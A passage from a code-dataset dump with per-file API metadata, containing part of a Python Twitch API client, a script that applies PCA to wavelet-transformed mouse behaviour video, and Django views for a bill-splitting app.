common.http.request_coro(\"https://api.twitch.tv/kraken/channels/%s/subscriptions\" % channel, headers=headers, data=data)\n\tsubscriber_data = json.loads(res)\n\treturn [\n\t\t(sub['user']['display_name'], sub['user'].get('logo'), sub['created_at'], sub.get('updated_at', sub['created_at']))\n\t\tfor sub in subscriber_data['subscriptions']\n\t]\n\n@asyncio.coroutine\ndef get_follows_channels(username=None):\n\tif username is None:\n\t\tusername = config[\"username\"]\n\theaders = {\n\t\t\"Client-ID\": config['twitch_clientid'],\n\t}\n\turl = \"https://api.twitch.tv/kraken/users/%s/follows/channels\" % username\n\tfollows = []\n\ttotal = 1\n\twhile len(follows) < total:\n\t\tdata = yield from common.http.request_coro(url, headers=headers)\n\t\tdata = json.loads(data)\n\t\ttotal = data[\"_total\"]\n\t\tfollows += data[\"follows\"]\n\t\turl = data[\"_links\"][\"next\"]\n\treturn follows\n\n@asyncio.coroutine\ndef get_streams_followed(token):\n\turl = \"https://api.twitch.tv/kraken/streams/followed\"\n\theaders = {\n\t\t\"Authorization\": \"OAuth %s\" % token,\n\t\t\"Client-ID\": config['twitch_clientid'],\n\t}\n\tstreams = []\n\ttotal = 1\n\twhile len(streams) < total:\n\t\tdata = yield 
from common.http.request_coro(url, headers=headers)\n\t\tdata = json.loads(data)\n\t\ttotal = data[\"_total\"]\n\t\tstreams += data[\"streams\"]\n\t\turl = data[\"_links\"][\"next\"]\n\treturn streams\n\n@asyncio.coroutine\ndef follow_channel(target, token):\n\theaders = {\n\t\t\"Authorization\": \"OAuth %s\" % token,\n\t\t\"Client-ID\": config['twitch_clientid'],\n\t}\n\tyield from common.http.request_coro(\"https://api.twitch.tv/kraken/users/%s/follows/channels/%s\" % (config[\"username\"], target),\n\t\t\t\t\t\t\t\t\t\tdata={\"notifications\": \"false\"}, method=\"PUT\", headers=headers)\n\n@asyncio.coroutine\ndef unfollow_channel(target, token):\n\theaders = {\n\t\t\"Authorization\": \"OAuth %s\" % token,\n\t\t\"Client-ID\": config['twitch_clientid'],\n\t}\n\tyield from common.http.request_coro(\"https://api.twitch.tv/kraken/users/%s/follows/channels/%s\" % (config[\"username\"], target),\n\t\t\t\t\t\t\t\t\t\tmethod=\"DELETE\", headers=headers)\n\n@asyncio.coroutine\ndef get_videos(channel=None, offset=0, limit=10, broadcasts=False, hls=False):\n\tchannel = channel or config[\"channel\"]\n\theaders = {\n\t\t\"Client-ID\": config['twitch_clientid'],\n\t}\n\tdata = yield from common.http.request_coro(\"https://api.twitch.tv/kraken/channels/%s/videos\" % channel, headers=headers, data={\n\t\t\"offset\": str(offset),\n\t\t\"limit\": str(limit),\n\t\t\"broadcasts\": \"true\" if broadcasts else \"false\",\n\t\t\"hls\": \"true\" if hls else \"false\",\n\t})\n\treturn json.loads(data)[\"videos\"]\n\ndef get_user(user):\n\theaders = {\n\t\t\"Client-ID\": config['twitch_clientid'],\n\t}\n\treturn json.loads(common.http.request(\"https://api.twitch.tv/kraken/users/%s\" % user, headers=headers))\n\nclass get_followers:\n\tdef __init__(self, channel, limit=25, direction='desc'):\n\t\tself.next_url = \"https://api.twitch.tv/kraken/channels/%s/follows\" % channel\n\t\tself.params = {\n\t\t\t'limit': str(limit),\n\t\t\t'direction': direction,\n\t\t}\n\t\tself.headers = {\n\t\t\t'Client-ID': config['twitch_clientid'],\n\t\t}\n\t\tself.follows = []\n\n\tdef __aiter__(self): # must return the async iterator itself, not a coroutine\n\t\treturn self\n\n\tasync def __anext__(self):\n\t\twhile True:\n\t\t\tif self.follows:\n\t\t\t\treturn self.follows.pop(0)\n\n\t\t\tif self.next_url is None:\n\t\t\t\traise StopAsyncIteration\n\n\t\t\tdata = json.loads(await common.http.request_coro(self.next_url, data=self.params, headers=self.headers))\n\t\t\tself.params = {}\n\t\t\tself.next_url = data['_links'].get('next') if data.get('_cursor') else None\n\t\t\tfor follow in data['follows']:\n\t\t\t\tfollow['created_at'] = dateutil.parser.parse(follow['created_at'])\n\t\t\t\tself.follows.append(follow)\n", "sub_path": "common/twitch.py", "file_name": "twitch.py", "file_ext": "py", "file_size_in_byte": 6713, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "common.config.config", "line_number": 25, "usage_type": "name"}, {"api_name": "common.config.config", "line_number": 30, "usage_type": "name"}, {"api_name": "common.http.http.request", "line_number": 32, "usage_type": "call"}, {"api_name": "common.http.http", "line_number": 32, "usage_type": "attribute"}, {"api_name": "common.http", "line_number": 32, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 33, "usage_type": "call"}, {"api_name": "common.http.http.request", "line_number": 46, "usage_type": "call"}, {"api_name": "common.http.http", "line_number": 46, "usage_type": "attribute"}, {"api_name": "common.http", "line_number": 
46, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 47, "usage_type": "call"}, {"api_name": "common.utils.cache", "line_number": 51, "usage_type": "call"}, {"api_name": "common.utils", "line_number": 51, "usage_type": "name"}, {"api_name": "common.config.config", "line_number": 71, "usage_type": "name"}, {"api_name": "common.http.http.request", "line_number": 73, "usage_type": "call"}, {"api_name": "common.http.http", "line_number": 73, "usage_type": "attribute"}, {"api_name": "common.http", "line_number": 73, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 74, "usage_type": "call"}, {"api_name": "common.utils.cache", "line_number": 55, "usage_type": "call"}, {"api_name": "common.utils", "line_number": 55, "usage_type": "name"}, {"api_name": "common.config.config", "line_number": 105, "usage_type": "name"}, {"api_name": "common.http.http.request_coro", "line_number": 113, "usage_type": "call"}, {"api_name": "common.http.http", "line_number": 113, "usage_type": "attribute"}, {"api_name": "common.http", "line_number": 113, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 114, "usage_type": "call"}, {"api_name": "asyncio.coroutine", "line_number": 101, "usage_type": "attribute"}, {"api_name": "common.config.config", "line_number": 123, "usage_type": "name"}, {"api_name": "common.config.config", "line_number": 125, "usage_type": "name"}, {"api_name": "common.http.http.request_coro", "line_number": 131, "usage_type": "call"}, {"api_name": "common.http.http", "line_number": 131, "usage_type": "attribute"}, {"api_name": "common.http", "line_number": 131, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 132, "usage_type": "call"}, {"api_name": "asyncio.coroutine", "line_number": 120, "usage_type": "attribute"}, {"api_name": "common.config.config", "line_number": 143, "usage_type": "name"}, {"api_name": "common.http.http.request_coro", "line_number": 148, "usage_type": "call"}, {"api_name": "common.http.http", "line_number": 148, "usage_type": "attribute"}, {"api_name": "common.http", "line_number": 148, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 149, "usage_type": "call"}, {"api_name": "asyncio.coroutine", "line_number": 138, "usage_type": "attribute"}, {"api_name": "common.config.config", "line_number": 159, "usage_type": "name"}, {"api_name": "common.http.http.request_coro", "line_number": 161, "usage_type": "call"}, {"api_name": "common.http.http", "line_number": 161, "usage_type": "attribute"}, {"api_name": "common.http", "line_number": 161, "usage_type": "name"}, {"api_name": "common.config.config", "line_number": 161, "usage_type": "name"}, {"api_name": "asyncio.coroutine", "line_number": 155, "usage_type": "attribute"}, {"api_name": "common.config.config", "line_number": 168, "usage_type": "name"}, {"api_name": "common.http.http.request_coro", "line_number": 170, "usage_type": "call"}, {"api_name": "common.http.http", "line_number": 170, "usage_type": "attribute"}, {"api_name": "common.http", "line_number": 170, "usage_type": "name"}, {"api_name": "common.config.config", "line_number": 170, "usage_type": "name"}, {"api_name": "asyncio.coroutine", "line_number": 164, "usage_type": "attribute"}, {"api_name": "common.config.config", "line_number": 175, "usage_type": "name"}, {"api_name": "common.config.config", "line_number": 177, "usage_type": "name"}, {"api_name": "common.http.http.request_coro", "line_number": 179, "usage_type": "call"}, {"api_name": "common.http.http", "line_number": 179, "usage_type": 
"attribute"}, {"api_name": "common.http", "line_number": 179, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 185, "usage_type": "call"}, {"api_name": "asyncio.coroutine", "line_number": 173, "usage_type": "attribute"}, {"api_name": "common.config.config", "line_number": 189, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 191, "usage_type": "call"}, {"api_name": "common.http.http.request", "line_number": 191, "usage_type": "call"}, {"api_name": "common.http.http", "line_number": 191, "usage_type": "attribute"}, {"api_name": "common.http", "line_number": 191, "usage_type": "name"}, {"api_name": "common.config.config", "line_number": 201, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 216, "usage_type": "call"}, {"api_name": "common.http.http.request_coro", "line_number": 216, "usage_type": "call"}, {"api_name": "common.http.http", "line_number": 216, "usage_type": "attribute"}, {"api_name": "common.http", "line_number": 216, "usage_type": "name"}, {"api_name": "dateutil.parser.parser.parse", "line_number": 220, "usage_type": "call"}, {"api_name": "dateutil.parser.parser", "line_number": 220, "usage_type": "attribute"}, {"api_name": "dateutil.parser", "line_number": 220, "usage_type": "name"}]} +{"seq_id": "31208849", "text": "'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''\n\n----------- Perform PCA on wavelet-transformed mouse video -------------------------\n\n\n'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''\n\nimport numpy as np; import cv2; import sklearn.decomposition; import os; import warnings; \nfrom learning_funcs import reconstruct_from_wavelet; from sklearn.externals import joblib; import glob\nwarnings.filterwarnings('once')\n\n''' -------------------------------------------------------------------------------------------------------------------------------------\n#------------------------ Select data file and analysis parameters --------------------------------------\n#--------------------------------------------------------------------------------------------------------------------------------------'''\n\n\n# ------------------------------------------\n# Select data file name and folder location\n# ------------------------------------------\nsave_folder_location = \"C:\\\\Drive\\\\Video Analysis\\\\data\\\\3D_pipeline\\\\\"\n\nsession_name_tags = ['session1']\ntwoD = True\n\ndata_library_name_tag = 'test2D'\n\n\n\n\nexamine_PCA_reconstruction = True\nexamine_PCA_reconstruction_cumulatively = True\ndo_not_overwrite = True\n\n# ---------------------------\n# Select analysis parameters\n# ---------------------------\nnum_PCs_to_create = 10\n\nfeature_relevance_threshold = 0.01\nmodify_relevant_features_from_previous_runs = True\ndisplay_frame_rate = 40\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n'''-------------------------------------------------------------------------------------------------------------------------------------\n#----------------------- Prepare wavelet transformed data -----------------------------------\n#------------------------------------------------------------------------------------------------------------------------------------'''\n\n\n\n# -----------------------------------------------\n# Find data library folder and sessions name tags\n# -----------------------------------------------\nfolder_location_data_library = 
save_folder_location + data_library_name_tag + '\\\\'\nif not os.path.isdir(folder_location_data_library):\n os.makedirs(folder_location_data_library)\nfile_location_data_library = folder_location_data_library + data_library_name_tag\nprint(\"saving to \" + folder_location_data_library)\nif twoD:\n twoD_suffix = '2D'\nelse:\n twoD_suffix = ''\n\n\n\n# ----------------------------------------------------------------------------------------------------------\n# Initialize huge array of wavelet features from all videos, plus the indices of important wavelet features\n# ----------------------------------------------------------------------------------------------------------\ncoeff_slices = np.load(save_folder_location + 'wavelet_slices.npy')\n\nprint('preparing features...')\nif not modify_relevant_features_from_previous_runs and os.path.isfile(file_location_data_library + '_relevant_wavelet_features_PCA' + twoD_suffix + '.npy'):\n relevant_wavelet_features = np.load(file_location_data_library + '_relevant_wavelet_features_PCA' + twoD_suffix + '.npy')\n new_relevant_wavelet_features = False\nelse:\n relevant_wavelet_features = np.ones(39*39).astype(bool)\n new_relevant_wavelet_features = True\n print('and calculating relevant features...')\n \n \n\n# ------------------------------------------------------------------------\n# for each session, add the wavelet features to the huge array of features\n# ------------------------------------------------------------------------\nwavelet_array_all_sessions = np.zeros((1, len(relevant_wavelet_features)))\nwavelet_feature_std_all_sessions = np.zeros(39 * 39)\nsession_index = []\n\nfor session in enumerate(session_name_tags):\n print(session[1])\n file_locations_saved_data = glob.glob(save_folder_location + session[1] + '\\\\' + '*wavelet' + twoD_suffix + '.npy')\n if len(file_locations_saved_data)==0:\n raise Exception('wavelet data not found')\n wavelet_array_session = np.zeros((1, len(relevant_wavelet_features)))\n # do so for every video\n for wavelet_video in enumerate(file_locations_saved_data):\n if wavelet_video[1].find('upside') > 0: # skip upside-down data\n continue\n wavelet_array = np.load(wavelet_video[1]) # .astype(np.float64)\n wavelet_array = np.reshape(wavelet_array, (39 * 39, wavelet_array.shape[2]))\n wavelet_array_session = np.concatenate((wavelet_array_session, wavelet_array[relevant_wavelet_features, :].T))\n wavelet_array_session = wavelet_array_session[1:,:]\n wavelet_array_all_sessions = np.concatenate((wavelet_array_all_sessions, wavelet_array_session))\nwavelet_array_all_sessions = wavelet_array_all_sessions[1:, :]\n\n\n\n# -------------------------------------------------------------------\n# Find the features that vary across time and are therefore relevant\n# -------------------------------------------------------------------\nif new_relevant_wavelet_features:\n relevant_wavelet_features = (np.std(wavelet_array_all_sessions, axis=0) > feature_relevance_threshold)\n # also save the index of each of these features\n relevant_wavelet_features = np.where(relevant_wavelet_features)[0]\n np.save(file_location_data_library + '_relevant_wavelet_features_PCA' + twoD_suffix + '.npy', relevant_wavelet_features) \n wavelet_array_all_sessions = wavelet_array_all_sessions[:, relevant_wavelet_features]\nprint(str(len(relevant_wavelet_features)) + ' relevant features retained from wavelet transform')\n\nwavelet_relevant_mean = np.mean(wavelet_array_all_sessions, axis=0)\nlevel = 5 # how many different spatial scales are used in wavelet 
transform\ndiscard_scale = 4\n\n\n''' -------------------------------------------------------------------------------------------------------------------------------------\n#----------------------- Examine each PC -----------------------------------\n#--------------------------------------------------------------------------------------------------------------------------------------''' \n\nif examine_PCA_reconstruction:\n \n # ------------------------------------------\n # Generate the PCs for the wavelet features\n # ------------------------------------------\n print('fitting pca...')\n pca = sklearn.decomposition.PCA(n_components=num_PCs_to_create, svd_solver ='arpack') #if too slow, try svd_solver = 'randomized'\n pca.fit(wavelet_array_all_sessions) # input: (samples, features)\n\n # for each PC:\n for n_com in range(0, num_PCs_to_create):\n # -----------------------------------\n # Compute the expansion coefficients\n # ----------------------------------- \n if examine_PCA_reconstruction_cumulatively: # Reconstruct the data based on all the PCs taken so far\n coeffs = np.zeros((num_PCs_to_create,600))\n coeffs[0:n_com + 1,:] = pca.transform(wavelet_array_all_sessions).T[0:n_com + 1, 0:600]\n wavelet_array_relevant_features_recon = pca.inverse_transform(coeffs.T)\n else: # Reconstruct the data based on only the current PC\n coeffs = pca.transform(wavelet_array_all_sessions).T[n_com:n_com + 1, 0:600]\n wavelet_array_relevant_features_recon = (pca.components_[n_com:n_com+1].T@coeffs).astype(float).T + wavelet_relevant_mean\n \n # -----------------------------------\n # Report PC performance\n # ----------------------------------- \n print('principal component ' + str(n_com+1)) \n print(str((100*pca.explained_variance_ratio_[n_com])) + '% var explained by this PC')\n print(str((100*sum(pca.explained_variance_ratio_[0:n_com+1]))) + '% var explained total'); print('')\n \n # ------------------------------------\n # Display PC reconstruction over time\n # ------------------------------------ \n empty_wavelet = np.zeros(39*39)\n if n_com == 0 or n_com == 9:\n num_to_see = 500\n else:\n num_to_see = 300\n for frame_num in range(num_to_see):\n empty_wavelet[relevant_wavelet_features] = wavelet_array_relevant_features_recon[frame_num,:]\n wavelet = np.reshape(empty_wavelet,(39,39))\n #reconstruct image from wavelet transform\n reconstruction_from_wavelet = reconstruct_from_wavelet(wavelet, coeff_slices, level, discard_scale)\n reconstruction_from_wavelet[reconstruction_from_wavelet > 255] = 255\n reconstruction_from_wavelet = cv2.resize(abs(reconstruction_from_wavelet).astype(np.uint8),(450,450))\n cv2.imshow('PC / wavelet reconstruction', reconstruction_from_wavelet)\n \n if cv2.waitKey(int(1000/display_frame_rate)) & 0xFF == ord('q'):\n break\n \n if cv2.waitKey(500) & 0xFF == ord('q'):\n break\n \n \n''' -------------------------------------------------------------------------------------------------------------------------------------\n#----------------------- Save PCs -----------------------------------\n#--------------------------------------------------------------------------------------------------------------------------------------'''\n\n\n\n# Generate the PCs for the wavelet features\nprint('saving pca model...')\npca = sklearn.decomposition.PCA(n_components=num_PCs_to_create, svd_solver ='arpack') #if too slow, try svd_solver = 'randomized'\npca.fit(wavelet_array_all_sessions) # input: (samples, features)\n\nif os.path.isfile(file_location_data_library + '_pca' + twoD_suffix) and 
do_not_overwrite:\n raise Exception('File already exists') \njoblib.dump(pca, file_location_data_library + '_pca' + twoD_suffix)\n\nfor session in enumerate(session_name_tags):\n \n wavelet_array = np.load(save_folder_location + session[1] + '\\\\' + session[1] + '_wavelet' + twoD_suffix + '.npy')\n wavelet_array = np.reshape(wavelet_array, (39 * 39, wavelet_array.shape[2]))[relevant_wavelet_features,:].T\n \n # Compute the expansion coefficients\n pca_coeffs = pca.transform(wavelet_array) #input: (samples, features)\n \n # Save the coefficients\n pca_file_location = save_folder_location + session[1] + '\\\\' + session[1] + '_pca_coeffs_' + data_library_name_tag + twoD_suffix + '.npy'\n np.save(pca_file_location, pca_coeffs)\n\n \n\n\n\n", "sub_path": "superorganism-analysis/superorganism-learning/PCA.py", "file_name": "PCA.py", "file_ext": "py", "file_size_in_byte": 10671, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "warnings.filterwarnings", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path", "line_number": 74, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 91, "usage_type": "call"}, {"api_name": "os.path", "line_number": 91, "usage_type": "attribute"}, {"api_name": "numpy.load", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 105, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 138, "usage_type": "call"}, {"api_name": "sklearn.decomposition.decomposition.PCA", "line_number": 153, "usage_type": "call"}, {"api_name": "sklearn.decomposition.decomposition", "line_number": 153, "usage_type": "attribute"}, {"api_name": "sklearn.decomposition", "line_number": 153, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 162, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 179, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 186, "usage_type": "call"}, {"api_name": "learning_funcs.reconstruct_from_wavelet", "line_number": 188, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 190, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 190, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 191, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 193, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 196, "usage_type": "call"}, {"api_name": "sklearn.decomposition.decomposition.PCA", "line_number": 208, "usage_type": "call"}, 
{"api_name": "sklearn.decomposition.decomposition", "line_number": 208, "usage_type": "attribute"}, {"api_name": "sklearn.decomposition", "line_number": 208, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 211, "usage_type": "call"}, {"api_name": "os.path", "line_number": 211, "usage_type": "attribute"}, {"api_name": "sklearn.externals.joblib.dump", "line_number": 213, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib", "line_number": 213, "usage_type": "name"}, {"api_name": "numpy.load", "line_number": 217, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 218, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 225, "usage_type": "call"}]} +{"seq_id": "62191370", "text": "from django.shortcuts import render\nfrom .models import Group,Expense,Payment\nfrom django.shortcuts import render, get_object_or_404\nfrom .form import GroupForm,AddExpense,NameForm\nfrom django.http import HttpResponseRedirect,HttpResponse\nfrom django.core.exceptions import PermissionDenied \nfrom django.contrib.auth.models import User \nfrom django.shortcuts import redirect\n\ndef home(request):\n groups= Group.objects.all()\n return render(request, 'blog/home.html', {'groups':groups})\n\n\ndef group_detail(request, pk):\n group=get_object_or_404(Group,pk=pk)\n g2=Group.objects.filter(group_name=group.group_name).first()\n g3=Group.objects.filter(group_name=group.group_name).first()\n m2=group.members.all()\n g1=Expense.objects.filter(group__group_name=group.group_name)\n return render(request, 'blog/group_detail.html',{'expense':g1,'member':m2,'pk':pk})\n\ndef group_new(request):\n if request.method == \"POST\":\n form = GroupForm(request.POST)\n if form.is_valid():\n group_name = form.cleaned_data['group_name']\n g1=Group(group_name=group_name)\n g1.save()\n\n description = form.cleaned_data['description']\n total_amount = form.cleaned_data['total_amount']\n paid_by=form.cleaned_data['Paid_by']\n if not User.objects.filter(username=paid_by): \n return PermissionDenied\n u1=User.objects.filter(username=paid_by).first()\n g1.members.add(u1) \n e1=Expense(total_amount=total_amount,Payment=u1,description=description,group=g1)\n e1.save()\n count_amount=0\n member_name = form.cleaned_data['member_name']\n member_name=member_name.replace('-', ',').split(',')\n for member in member_name: \n if(member.isdigit()):\n a1=member \n count_amount+=int(a1) \n else:\n m1=member\n if not User.objects.filter(username=m1): \n return PermissionDenied\n member_amount=User.objects.filter(username=m1).first()\n g1.members.add(member_amount) \n continue\n \n p1=Payment(amount=a1,paid=member_amount,expense=e1,flag=False)\n p1.save()\n return redirect('group-detail',pk=g1.pk)\n\n else:\n form = GroupForm()\n return render(request, 'blog/group_edit.html', {'form': form})\n\ndef expense_detail(request, pk):\n expense=get_object_or_404(Expense,pk=pk)\n form = NameForm()\n e=Payment.objects.filter(expense__description=expense.description,expense__group__group_name=expense.group)\n return render(request, 'blog/expense_detail.html',{'expense':e,'form':form})\n\ndef expense_new(request,pk):\n if request.method == \"POST\":\n form = AddExpense(request.POST)\n if form.is_valid():\n group=get_object_or_404(Group,pk=pk)\n description = form.cleaned_data['description']\n total_amount = form.cleaned_data['total_amount']\n paid_by=form.cleaned_data['Paid_by']\n if not User.objects.filter(username=paid_by): \n return PermissionDenied\n u1=User.objects.filter(username=paid_by).first()\n 
e1=Expense(total_amount=total_amount,Payment=u1,description=description,group=group)\n e1.save()\n\n member_name = form.cleaned_data['member_name']\n member_name=member_name.replace('-', ',').split(',')\n for member in member_name: \n if(member.isdigit()):\n a1=member \n else:\n m1=member\n if not User.objects.filter(username=m1): \n raise PermissionDenied\n member_amount=User.objects.filter(username=m1).first()\n group.members.add(member_amount) \n continue\n \n p1=Payment(amount=a1,paid=member_amount,expense=e1,flag=False)\n p1.save()\n return redirect('group-detail',pk=group.pk)\n else:\n form = AddExpense()\n return render(request, 'blog/add_expense.html', {'form': form})\n\n\ndef paid_members(request,pk):\n expense=get_object_or_404(Expense,pk=pk)\n if request.method == 'POST':\n form = NameForm(request.POST)\n if form.is_valid():\n d = form.cleaned_data['your_name']\n u1=User.objects.filter(username=d).first()\n u=Payment.objects.filter(paid=u1,expense=expense).first()\n u.flag=True\n u.save()\n return render(request, 'blog/expense_detail.html', {'form': form})\n\n\n\n\n \n\n\n \n\n \n\n\n\n ", "sub_path": "splitwise/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 4756, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "models.Group.objects.all", "line_number": 11, "usage_type": "call"}, {"api_name": "models.Group.objects", "line_number": 11, "usage_type": "attribute"}, {"api_name": "models.Group", "line_number": 11, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 12, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 16, "usage_type": "call"}, {"api_name": "models.Group", "line_number": 16, "usage_type": "argument"}, {"api_name": "models.Group.objects.filter", "line_number": 17, "usage_type": "call"}, {"api_name": "models.Group.objects", "line_number": 17, "usage_type": "attribute"}, {"api_name": "models.Group", "line_number": 17, "usage_type": "name"}, {"api_name": "models.Group.objects.filter", "line_number": 18, "usage_type": "call"}, {"api_name": "models.Group.objects", "line_number": 18, "usage_type": "attribute"}, {"api_name": "models.Group", "line_number": 18, "usage_type": "name"}, {"api_name": "models.Expense.objects.filter", "line_number": 20, "usage_type": "call"}, {"api_name": "models.Expense.objects", "line_number": 20, "usage_type": "attribute"}, {"api_name": "models.Expense", "line_number": 20, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 21, "usage_type": "call"}, {"api_name": "form.GroupForm", "line_number": 25, "usage_type": "call"}, {"api_name": "form.is_valid", "line_number": 26, "usage_type": "call"}, {"api_name": "form.cleaned_data", "line_number": 27, "usage_type": "attribute"}, {"api_name": "models.Group", "line_number": 28, "usage_type": "call"}, {"api_name": "form.cleaned_data", "line_number": 31, "usage_type": "attribute"}, {"api_name": "form.cleaned_data", "line_number": 32, "usage_type": "attribute"}, {"api_name": "form.cleaned_data", "line_number": 33, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User.objects.filter", "line_number": 34, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 34, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 34, "usage_type": "name"}, {"api_name": "django.core.exceptions.PermissionDenied", "line_number": 35, 
"usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.filter", "line_number": 36, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 36, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 36, "usage_type": "name"}, {"api_name": "models.Expense", "line_number": 38, "usage_type": "call"}, {"api_name": "form.cleaned_data", "line_number": 41, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User.objects.filter", "line_number": 49, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 49, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 49, "usage_type": "name"}, {"api_name": "django.core.exceptions.PermissionDenied", "line_number": 50, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.filter", "line_number": 51, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 51, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 51, "usage_type": "name"}, {"api_name": "models.Payment", "line_number": 55, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 57, "usage_type": "call"}, {"api_name": "form.GroupForm", "line_number": 60, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 61, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 64, "usage_type": "call"}, {"api_name": "models.Expense", "line_number": 64, "usage_type": "argument"}, {"api_name": "form.NameForm", "line_number": 65, "usage_type": "call"}, {"api_name": "models.Payment.objects.filter", "line_number": 66, "usage_type": "call"}, {"api_name": "models.Payment.objects", "line_number": 66, "usage_type": "attribute"}, {"api_name": "models.Payment", "line_number": 66, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 67, "usage_type": "call"}, {"api_name": "form.AddExpense", "line_number": 71, "usage_type": "call"}, {"api_name": "form.is_valid", "line_number": 72, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 73, "usage_type": "call"}, {"api_name": "models.Group", "line_number": 73, "usage_type": "argument"}, {"api_name": "form.cleaned_data", "line_number": 74, "usage_type": "attribute"}, {"api_name": "form.cleaned_data", "line_number": 75, "usage_type": "attribute"}, {"api_name": "form.cleaned_data", "line_number": 76, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User.objects.filter", "line_number": 77, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 77, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 77, "usage_type": "name"}, {"api_name": "django.core.exceptions.PermissionDenied", "line_number": 78, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.filter", "line_number": 79, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 79, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 79, "usage_type": "name"}, {"api_name": "models.Expense", "line_number": 80, "usage_type": "call"}, {"api_name": "form.cleaned_data", "line_number": 83, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User.objects.filter", "line_number": 90, "usage_type": 
"call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 90, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 90, "usage_type": "name"}, {"api_name": "django.core.exceptions.PermissionDenied", "line_number": 91, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.filter", "line_number": 92, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 92, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 92, "usage_type": "name"}, {"api_name": "models.Payment", "line_number": 96, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 98, "usage_type": "call"}, {"api_name": "form.AddExpense", "line_number": 100, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 101, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 105, "usage_type": "call"}, {"api_name": "models.Expense", "line_number": 105, "usage_type": "argument"}, {"api_name": "form.NameForm", "line_number": 107, "usage_type": "call"}, 